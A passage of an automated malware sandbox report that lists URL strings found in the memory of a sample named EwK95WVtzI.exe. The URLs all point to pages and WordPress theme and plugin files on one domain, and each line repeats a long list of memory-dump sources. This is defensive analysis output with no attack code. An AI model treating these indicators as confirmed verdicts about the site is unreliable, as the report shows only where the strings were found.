00000000.00000003.1853565854.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1784646410.0000000004190000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1525347007.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871154486.0000000003A50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1659128921.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1610312709.0000000003F90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/feed
                Source: EwK95WVtzI.exe, 00000000.00000003.1738876014.0000000004A90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/immobilier
                Source: EwK95WVtzI.exe, 00000000.00000003.1738876014.0000000004A90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/page/2
                Source: EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1501880576.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1496465166.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504588099.0000000004860000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1853565854.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1784646410.0000000004190000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1525347007.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871154486.0000000003A50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1659128921.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1610312709.0000000003F90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/page/4
                Source: EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1501880576.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1496465166.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504588099.0000000004860000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1853565854.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1784646410.0000000004190000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1525347007.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871154486.0000000003A50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1659128921.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1610312709.0000000003F90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.5.2
                Source: EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1501880576.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1496465166.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504588099.0000000004860000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1853565854.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1784646410.0000000004190000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1525347007.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871154486.0000000003A50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1659128921.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1610312709.0000000003F90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/plugins/contact-form-7/includes/js/index.js?ver=5.5.2
                Source: EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1501880576.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1496465166.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504588099.0000000004860000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1853565854.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1784646410.0000000004190000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1525347007.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871154486.0000000003A50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1659128921.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1610312709.0000000003F90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/themes/internet-provider/css/bootstrap.css?ver=6.0.5
                Source: EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1501880576.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1496465166.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504588099.0000000004860000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1853565854.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1784646410.0000000004190000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1525347007.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871154486.0000000003A50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1659128921.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1610312709.0000000003F90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/themes/internet-provider/css/default.css?ver=6.0.5
                Source: EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1501880576.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1496465166.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504588099.0000000004860000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1853565854.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1784646410.0000000004190000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1525347007.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871154486.0000000003A50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1659128921.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1610312709.0000000003F90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/themes/internet-provider/css/fontawesome-all.css?ver=6.0.5
                Source: EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1501880576.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1496465166.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504588099.0000000004860000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1853565854.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1784646410.0000000004190000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1525347007.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871154486.0000000003A50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1659128921.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1610312709.0000000003F90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/themes/internet-provider/css/responsive.css?ver=6.0.5
                Source: EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1501880576.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1496465166.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504588099.0000000004860000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1853565854.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1784646410.0000000004190000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1525347007.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871154486.0000000003A50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1659128921.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1610312709.0000000003F90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/themes/internet-provider/js/bootstrap.js?ver=6.0.5
                Source: EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1501880576.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1496465166.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504588099.0000000004860000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1853565854.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1784646410.0000000004190000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1525347007.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871154486.0000000003A50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1659128921.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1610312709.0000000003F90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/themes/internet-provider/js/jquery.superfish.js?ver=6.0.5
                Source: EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1501880576.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1496465166.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504588099.0000000004860000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1853565854.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1784646410.0000000004190000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1525347007.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871154486.0000000003A50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1659128921.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1610312709.0000000003F90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/themes/internet-provider/js/theme.js?ver=6.0.5
                Source: EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1501880576.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1496465166.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504588099.0000000004860000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1853565854.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1784646410.0000000004190000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1525347007.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871154486.0000000003A50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1659128921.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1610312709.0000000003F90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/themes/internet-provider/style.css?ver=6.0.5
                Source: EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1501880576.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1496465166.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504588099.0000000004860000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1853565854.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1784646410.0000000004190000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1525347007.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871154486.0000000003A50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 